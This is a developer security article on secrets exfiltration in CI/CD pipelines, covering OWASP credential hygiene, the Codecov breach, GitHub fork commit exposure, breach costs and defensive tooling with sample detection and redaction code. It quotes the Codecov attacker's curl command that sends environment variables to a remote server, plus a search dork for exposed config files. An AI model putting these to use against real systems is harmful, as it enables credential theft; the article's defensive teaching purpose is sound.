Security Concepts for Developers: Secrets Exfiltration

In 2021, security researcher Bill Demirkapi began building automated processes to find secrets across the Internet. At DEFCON 32, he presented his findings - more than 15,000 developer secrets were inadvertently hard-coded into software. Among those vulnerable to compromise were the Nebraska State Supreme Court and Slack channels of Stanford University.

In modern software development, Continuous Integration and Continuous Delivery (CI/CD) streamlines the development cycle. This increase in automation and frequency of deployments also introduces risks, particularly in regard to secret management.

The use of third party resources and the valid secrets they require can easily be overlooked when ensuring deadlines are met.

What is considered a “secret”?

Secrets include any credentials or tokens used for access control to systems, databases or services. These include:

Credentials: Usernames, passwords and API keys.
Tokens: Authentication tokens and session identifiers.
Certificates: SSL/TLS certificates and encryption keys.
Internal resources: Internal IP addresses, endpoints and files.
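To make these categories concrete, here is a minimal sketch of how a few of them can be recognized in text with regular expressions. The pattern set and the `find_secrets` helper are illustrative assumptions, not a complete detector; production scanners use far larger and more carefully tuned rule sets.

```python
import re

# Illustrative patterns only; each one covers a single, well-known shape of secret.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "password_assignment": re.compile(
        r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*['\"][^'\"]+['\"]"
    ),
    "private_ipv4": re.compile(
        r"\b(?:10\.\d{1,3}|192\.168|172\.(?:1[6-9]|2\d|3[01]))\.\d{1,3}\.\d{1,3}\b"
    ),
}


def find_secrets(text):
    """Return (line_number, kind) for every pattern that matches a line of text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, kind))
    return findings
```

Simple patterns like these produce both false positives and false negatives, so treat any match as a prompt for review rather than proof of a leak.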

CICD-SEC-6: Insufficient Credential Hygiene

Credential hygiene refers to the practices associated with managing and protecting secrets. Insufficient credential hygiene is included in the OWASP Top 10 CI/CD Security Risks list.

Malicious attackers can obtain various types of secrets spread throughout the CI/CD pipeline to gain unauthorized access to critical resources and the data they store.

Poor credential hygiene can leave secrets exposed in:

Repositories and artifacts: Secrets can be leaked through version control repositories and build artifacts if they are not properly audited and sanitized.
Configuration files: Even index searches can return secrets. By utilizing advanced search filters and techniques offered by Google (referred to as Google Dorking) - secrets stored in configuration files can be discovered. For example, intitle:"index of" "config.php.txt" can be used as the search query and will return unsecured WordPress configuration files that contain MySQL credentials.
Environment variables: Incorrect permission configurations or unauthorized access can result in secrets being read from environment variables. When a malicious attacker moves laterally through a network, exposed environment variables can provide access to other systems and enable vertical movement via privilege escalation.
Third-party dependencies: If any dependencies contain hard-coded secrets they may be accessible to anyone who inspects the source code or binaries. The problematic presence of these can grow exponentially if the dependencies are forked or cloned to be managed independently.
API endpoints and webhooks: An API endpoint or webhook that returns data without proper access control or authentication/authorization protections can allow an attacker to enumerate a large number of secrets. For example, an API that returns a user-specific key in response to a request to the /api/v1/user?userid=12 endpoint could reveal sensitive information if the application is vulnerable to an Insecure Direct Object Reference (IDOR) attack and also returns the data for userid=13.
Logs and monitoring systems: If not properly managed, verbose error messages or captured debugging details may include secrets. This can quickly become a privacy and compliance nightmare because logs are often written to long term storage. At Arcjet we redact logs from our Go API and the Arcjet product now has a feature to detect personal information and block requests with any matches.
Collaboration tools: Tools such as Confluence, JIRA and even Slack correspondence can contain secrets.
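As one illustration of keeping secrets out of logs, the sketch below uses Python's standard logging module to scrub secret-like values before a record is written. It is a generic example and not Arcjet's implementation; the key names in `SECRET_PATTERN` and the `RedactingFilter` class are assumptions chosen for the demonstration.

```python
import logging
import re

# Hypothetical key names; extend this to match the secrets your systems handle.
SECRET_PATTERN = re.compile(
    r"(?i)\b(password|token|api[_-]?key|secret)\b(\s*[=:]\s*)(\S+)"
)


def redact(message):
    """Replace the value that follows a secret-like key with a placeholder."""
    return SECRET_PATTERN.sub(r"\1\2[REDACTED]", message)


class RedactingFilter(logging.Filter):
    """Logging filter that scrubs secret-like values before a record is emitted."""

    def filter(self, record):
        # Render the final message first so values passed as args are scrubbed too.
        record.msg = redact(record.getMessage())
        record.args = ()
        return True
```

Attaching the filter to a handler (`handler.addFilter(RedactingFilter())`) applies it to every record that handler emits. Pattern-based redaction is a safety net; avoiding logging secrets in the first place remains the stronger control.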

The Danger of Insufficient Secrets Management

The following two incidents demonstrate how secrets are obtained by malicious attackers:

The Codecov Breach

On April 1, 2021, Codecov learned that its Bash Uploader script had been compromised. Beginning January 31, 2021, an attacker had periodically modified the script after gaining unauthorized access through a flaw in Codecov’s Docker image creation process.

Docker images can be vulnerable to secret exfiltration in several ways. Secrets may be embedded in the source code, in the file that defines the image (known as the Dockerfile) or within the layers that make up the image. This can happen inadvertently at build time if secrets are read in from other systems and embedded as environment variables, ready to be used when the container is executed.
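A quick way to catch the most obvious form of this mistake is to look for ENV and ARG instructions whose names suggest a secret. The sketch below assumes a naming convention (names containing words such as "password" or "token"); the `risky_dockerfile_lines` helper is hypothetical and only inspects the Dockerfile text, not the built image.

```python
import re

# Assumed convention: instructions mentioning these words probably carry a secret.
SECRET_NAME = re.compile(r"(?i)(password|passwd|secret|token|api_?key)")
INSTRUCTION = re.compile(r"^\s*(ENV|ARG)\s+(.+)$", re.IGNORECASE)


def risky_dockerfile_lines(dockerfile_text):
    """Return (line_number, line) for ENV/ARG instructions that look secret-bearing."""
    risky = []
    for lineno, line in enumerate(dockerfile_text.splitlines(), start=1):
        match = INSTRUCTION.match(line)
        # The whole instruction body is searched, so a suspicious value also flags the line.
        if match and SECRET_NAME.search(match.group(2)):
            risky.append((lineno, line.strip()))
    return risky
```

Values set this way are recorded in the image's configuration and build history, so anyone who can pull the image may be able to read them.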

A malicious attacker was able to extract a secret that enabled them to make the adjustments to the bash commands within the Bash Uploader script. The modification made was the addition of the following:

curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://[IPADDRESS]/upload/v2 || true

This malicious line of code sent the Git remote URLs and every environment variable accessible to the Bash Uploader, including any secrets they held, to the attacker-controlled server hosting the upload endpoint. Using these secrets, the attackers compromised the systems and sensitive data of the affected Codecov users.
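Because the injected command simply dumped the process environment, one way to limit the damage of a similar compromise is to run third-party scripts with only the variables they need. The following is a minimal sketch under that assumption; the `ALLOWED_VARS` allowlist and both helper functions are hypothetical names, and the right allowlist depends on the tool being run.

```python
import os
import subprocess

# Hypothetical allowlist: only variables the third-party tool genuinely needs.
ALLOWED_VARS = {"PATH", "HOME", "LANG"}


def minimal_env(environ, allowed=ALLOWED_VARS):
    """Return a copy of environ containing only allowlisted variable names."""
    return {name: value for name, value in environ.items() if name in allowed}


def run_untrusted(command, environ=None):
    """Run command with a stripped-down environment and return its stdout."""
    env = minimal_env(os.environ if environ is None else environ)
    result = subprocess.run(
        command, env=env, capture_output=True, text=True, check=True
    )
    return result.stdout
```

With this approach, a tampered script that calls `env` would see only the allowlisted variables rather than every credential available to the CI job.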

The Codecov breach underscores the importance of safeguarding CI/CD pipelines. A secret that could be recovered from a Docker image allowed attackers to tamper with a widely used script and compromise user data.
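A general defense against a tampered download is to pin the expected digest of a script and refuse to run it if the digest changes. The sketch below shows the idea with SHA-256; the function names are assumptions, and it presumes the pinned digest was obtained through a channel you trust.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as a lowercase hex string."""
    return hashlib.sha256(data).hexdigest()


def verify_script(script_bytes: bytes, expected_sha256: str) -> bool:
    """Return True only if the script matches the pinned digest."""
    actual = sha256_hex(script_bytes)
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(actual, expected_sha256.lower())
```

A pipeline would download the script to memory or disk, call `verify_script`, and execute it only when the check passes, instead of piping the download straight into a shell.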

Cross Fork Object Reference (CFOR)

When secrets are mistakenly included in code pushed to version control systems, they are exposed to anyone with repository access and will persist in version history even after deletion.

Publicly exposed credentials will be exploitable until they are revoked.

This also expands the attack surface since even though secrets may not be present in the current state of your codebase - they can be hidden within any iteration on the historical timeline.

A new vulnerability type discovered by Truffle Security allows access to data from deleted forks and repositories (even private ones) on GitHub. Due to its similarity to an IDOR vulnerability, it has been named Cross Fork Object Reference (CFOR).

In a CFOR attack, if an attacker knows the SHA-1 hash of a commit, they can access the contents of that commit—even from deleted forks or repositories—by inserting the hash into a GitHub URL. This allows unauthorized access to code and potentially sensitive data that should no longer be accessible.

https://github.com/<user/org>/<repository>/commit/<hash>

The SHA-1 hash that identifies a commit does not have to be supplied in full: it can also be referenced by its short value. The short SHA-1 value is the minimum number of characters needed to avoid a collision with another hash (with a bare minimum of 4 hexadecimal characters). The number of possible 4-character short values is 16*16*16*16, a total of only 65,536 unique combinations. Iterating over every possible value would be trivial for an automated program.
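The arithmetic is easy to check. This short sketch counts and enumerates every hexadecimal prefix of a given length; the function names are illustrative.

```python
from itertools import product

HEX_DIGITS = "0123456789abcdef"


def keyspace(length):
    """Number of distinct hexadecimal prefixes of the given length."""
    return len(HEX_DIGITS) ** length


def short_hashes(length=4):
    """Yield every possible hexadecimal prefix of the given length, in order."""
    for digits in product(HEX_DIGITS, repeat=length):
        yield "".join(digits)
```

`keyspace(4)` is 65,536, while a full 40-character SHA-1 value has 16^40 possibilities. That gap is why accepting short values turns an infeasible search into a trivial one.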

This vulnerability significantly expands the attack surface for repositories that were thought to be private or deleted. If secrets were ever committed to such repositories, they remain at risk of exposure—even after deletion.

The Consequences of Leaked Secrets

IBM publishes annual analysis reports on the financial repercussions for organizations that become victims of data breaches. The latest report, “Cost of a Data Breach Report 2024”, reveals that 16% of all breaches studied can be attributed to stolen credentials as the utilized attack vector.

These incidents are notably expensive, costing an average of $4.81 million per breach. Furthermore, breaches involving stolen or compromised credentials took the longest to detect - taking an average of 229 days to identify. Additionally, the containment of such breaches required an extra 63 days.

Beyond the direct financial costs and operational delays, the consequences of a breach due to compromised credentials can extend to:

Regulatory and compliance penalties: According to the same report published by IBM, regulatory fines associated with a data breach amounting to over $100,000 saw a 19.5% increase over 2023.
Reputation damage: A Cyberint report examining the repercussions of negative public perception after a breach in the financial and retail industries found that over 60% of retail customers said they would consider no longer doing business with the affected retailer or financial institution. High-income customers are even more likely to take such action, with 74% indicating they would consider discontinuing their business.
Loss of market capitalization: A Harvard Business Review article examining the long-term impacts of a data breach estimates a mean loss of $5.4 billion in market capitalization post breach.

Now that we understand the risks, let’s explore practical steps to manage secrets effectively.

Secrets Management Best Practices

To reduce your risk from leaked secrets, limit the harm they cause your organization and prevent them from leaking in the first place, adhere to the following suggestions:

Use secrets that expire: Credentials that are long-lived are convenient for developers but increase the chances of them being discovered and utilized in an attack. Short-term use credentials (aka Just-in-Time credentials) minimize risk due to their limited validity. These can be configured to expire as soon as they’re used or a specified operation is completed.
Use an allowlist: Only allowing certain explicitly set IP addresses to use credentials adds an extra layer of security.
Avoid using wildcard command arguments: Wildcard commands, such as git add *, can capture files containing sensitive information. You can manually review each commit to ensure you have the right files included, but a better approach is to set up a .gitignore file (below).
Add sensitive files to the ignore file: Exclude files only used for development by adding them to an ignore file. GitHub provides a comprehensive collection of .gitignore templates.
If copyrighted material was leaked: To have the sensitive content removed from GitHub, consult GitHub’s removal policy. For exposure elsewhere, submit an official takedown form.
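The first two suggestions, expiry and an IP allowlist, can be combined in a single check. The sketch below is a simplified model under stated assumptions: the `Credential` class, `issue` and `is_usable` are hypothetical names, and a real system would also need secure token generation and storage.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Credential:
    token: str
    expires_at: datetime
    allowed_networks: tuple  # CIDR strings, e.g. ("203.0.113.0/24",)


def issue(token, ttl_seconds, allowed_networks, now=None):
    """Create a credential that expires ttl_seconds after it is issued."""
    now = now or datetime.now(timezone.utc)
    expires_at = now + timedelta(seconds=ttl_seconds)
    return Credential(token, expires_at, tuple(allowed_networks))


def is_usable(cred, client_ip, now=None):
    """A credential is usable only before expiry and from an allowlisted network."""
    now = now or datetime.now(timezone.utc)
    if now >= cred.expires_at:
        return False
    addr = ip_address(client_ip)
    return any(addr in ip_network(net) for net in cred.allowed_networks)
```

Even if such a credential leaks, an attacker has to use it from an allowed network before it expires, which narrows the window considerably.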

Tooling

Automated tooling is the best way to enhance your secrets management because it will provide consistent protection.

1Password Shell Plugins

1Password provides a secure way to store and manage credentials and secrets and can be integrated into your CLI. With 1Password CLI:

Credentials/secrets used in environment variables, configuration files and scripts can be referenced from the secure 1Password repository instead of being exposed in plaintext files on disk. Any changes to them are automatically reflected wherever they are referenced.
All access is logged and is auditable by 1Password so in the event of a breach it’s easier to find out what was accessed and when.
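On the application side, the practical effect is that code reads secrets at runtime instead of containing them. The following sketch assumes a secrets manager (such as the 1Password CLI) has placed the value in the process environment when the program was launched; `require_secret` and `MissingSecretError` are hypothetical names.

```python
import os


class MissingSecretError(RuntimeError):
    """Raised when a required secret was not provided to the process."""


def require_secret(name, environ=None):
    """Return the secret stored under name, failing loudly if it is absent."""
    environ = os.environ if environ is None else environ
    value = environ.get(name, "").strip()
    if not value:
        # Only the variable name appears in the error, never a value.
        raise MissingSecretError(f"required secret {name} is not set")
    return value
```

Failing at startup when a secret is missing is usually preferable to falling back to a hard-coded default, which is how many leaked credentials end up in source code.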

Trufflehog

Trufflehog is a tool provided by Truffle Security. With Trufflehog:

Deep scans across your entire software development lifecycle can be performed to find exposed credentials/secrets. At Arcjet we scan all of our build artifacts before uploading them to the container repository.
If any are discovered, analysis will be performed to identify the resources and permissions associated with them.
Preemptive measures can be implemented by using hooks to reduce accidental exposure of sensitive information.
Credentials/secrets are constantly monitored to ensure that any vulnerabilities are identified and addressed.
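To give a feel for how automated detection can work, the sketch below flags long, random-looking strings by their Shannon entropy. This is a generic heuristic shown for illustration and is not a description of how Trufflehog works internally; the token pattern and the 4.0 threshold are assumptions.

```python
import math
import re
from collections import Counter

# Candidate tokens: runs of 20+ characters commonly found in keys and tokens.
TOKEN = re.compile(r"[A-Za-z0-9+/_-]{20,}")


def shannon_entropy(text):
    """Bits of entropy per character, based on character frequencies."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def high_entropy_tokens(text, threshold=4.0):
    """Return candidate tokens whose entropy meets or exceeds the threshold."""
    return [tok for tok in TOKEN.findall(text) if shannon_entropy(tok) >= threshold]
```

A check like this could run from a pre-commit hook over staged changes. Entropy alone flags plenty of harmless strings, such as hashes and identifiers, which is one reason dedicated tools also verify what they find.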

Trufflehog is also available as a Chrome Extension.

Choosing a Secret Management Service

It’s good practice to use a secrets management tool for any type of coding project, even personal ones because you can get into the habit of using them.

There are a variety of different secret management services to choose from, though when making a selection, the service should provide the following:

Encryption: Ensure that the secrets management service provides encryption mechanisms for both stored and transmitted data to defend against interception. By encrypting the values, an extra line of defense is added in case a malicious attacker is able to access them.
Access controls: The service should support fine-grained access controls, allowing you to apply the principle of least privilege. This can be accomplished by configuring Role-Based Access Controls (RBAC). Regularly audit which members have access to what and evaluate necessity.
Automatic rotation: Scheduling the automatic rotation of secrets should be an available feature. This is similar to how Let’s Encrypt certificates are valid for relatively short periods but can be renewed automatically. This turnover limits how long a secret that was exposed without your knowledge remains valid. Verify that the automatic handling is compatible with your applications and systems.
Backups: Regular backups of stored secrets should be available to provide recovery in the event of data loss or corruption. Again, make sure these are encrypted.
Centralized storage: Although it might seem counterintuitive to keep all secrets in one place, using a centralized repository actually improves visibility and control. By avoiding the storage of secrets in multiple locations with different management practices, you minimize the time spent searching for hidden secrets throughout the codebase.
Push protection: Automatic protection against accidentally pushing code containing secrets should be available. As secret exposure is often due to human error, a filter that notifies your development team of any possible secrets being pushed is a proactive measure that helps you avoid incident response in the first place. GitHub offers this for free for open source repos.
Auditing: Thorough observability features and insights are crucial for management. Knowing when secret-related activities took place is essential for detecting and responding to security incidents. The service should produce security state metrics and provide the visibility to know when action needs to be taken.
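If a service does not rotate secrets for you, a simple age check can at least tell you which ones are overdue. This sketch assumes you can export each secret's last rotation time; the `secrets_due_for_rotation` helper and the 90-day default are illustrative choices, not a recommendation from any particular provider.

```python
from datetime import datetime, timedelta, timezone


def secrets_due_for_rotation(last_rotated, max_age_days=90, now=None):
    """Return the names of secrets last rotated more than max_age_days ago."""
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=max_age_days)
    return sorted(
        name for name, rotated_at in last_rotated.items() if rotated_at < cutoff
    )
```

Running a check like this on a schedule and alerting on the result gives a basic form of the visibility described above.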

Conclusion

As a developer, protecting your code and infrastructure from secret leaks and security vulnerabilities is critical. To safeguard your projects, take these key actions:

Never commit secrets to version control: Use tools like Trufflehog to scan for sensitive information before pushing code.
Use automated secrets management tools: Tools like the 1Password CLI ensure that secrets are stored securely and are easy to rotate.
Implement short-lived credentials: Just-in-time credentials and automatic rotation reduce the window of exposure if a secret is compromised.
Audit and sanitize your repositories: Regularly review your codebase, especially before deleting or archiving repositories, to ensure no sensitive data remains.
Monitor and enforce security policies: Leverage CI/CD pipelines to automatically detect and prevent secret leaks.

By following these best practices and integrating automated tools, you can minimize your security risks and stay ahead of potential vulnerabilities.